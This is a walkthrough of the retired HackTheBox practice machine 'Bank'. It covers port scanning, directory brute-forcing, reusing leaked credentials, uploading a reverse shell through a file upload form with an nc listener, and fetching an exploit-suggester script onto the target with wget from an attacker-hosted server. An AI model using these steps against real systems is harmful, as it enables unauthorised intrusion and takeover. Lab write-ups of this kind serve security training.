Bank Walkthrough
Hey folks, we are back again with one of HackTheBox retired machines βBankβ, before we talk about it letβs take a look at its info


Letβs get startedβ¦
Nmap Scan
We usually start our scan with nmap
scan to discover all open ports, service running, OS detection, etc
nmap -A -T4 -oG bank.gnmap 10.10.10.29

We have 3 open ports ssh/dns/http
Iβve tried to brute-force ssh
credentials and search for vhosts
or zone transfer
but it fails so letβs go to the next step, nothing important here
Web Enumeration
If you try to open 10.10.10.29:80
you will get the default page of the server

But if you try echo "10.10.10.29 bank.htb" > /etc/hosts
and search for http://bank.htb
you will get a different page βLogin portalβ and by using this plugin I know that it redirects me to an unknown page before getting the login portal.
Letβs start to discover the hidden directories by using dirbuster/gobuster/ffuf/dirsearch

You will get more of a bunch of directories which is open and available.
After discovering them, Iβve big data in the last one /balance_transfer

Note that all these files have the same size, but thereβs one has a different size, so we will open it first

Good, we found credentials, letβs use them to login to the login portal

Here we go! Nice design :)
User Flag
After discovering the whole account, I found an upload function on bank.htb/support
and then we grabbed a reverse shell from here and then uploaded it

The next step is to open nc
as a listener on the port which I insert to the shell code nc -lvp <port>
and then access the shell form the website


Nice, weβre in the server now but unfortunately in the user priv not root so letβs grab the user.txt
first and then try to be root

Root Flag
Itβs time now to grab the root.txt
. Iβve used Linux-Exploit-Suggester to know which vulnerabilities the machine is affected by downloading it on the attack machine and then transferring it to the vulnerable machine
Iβve used python -m SimpleHTTPServer 80
to make the attacker machine act as a server, and then go to /tmp
the directory in the vulnerable machine to have permission to write there and then downloaded wget http://<attacker-machine-ip>/<file-name>
and it was downloaded. Letβs execute it

We have 4 vulnerabilities that works on this machine but unfortunately, thereβs no one of them works with me, so Iβll try to discover all directories to find any juicy file which gave me a root access
After minutes, I found this directory /var/htb

And have this executable file

As you can see Iβve tried to execute it, but itβs failed so I execute it from the bin
directory, and itβs worked as you can see β€
Last updated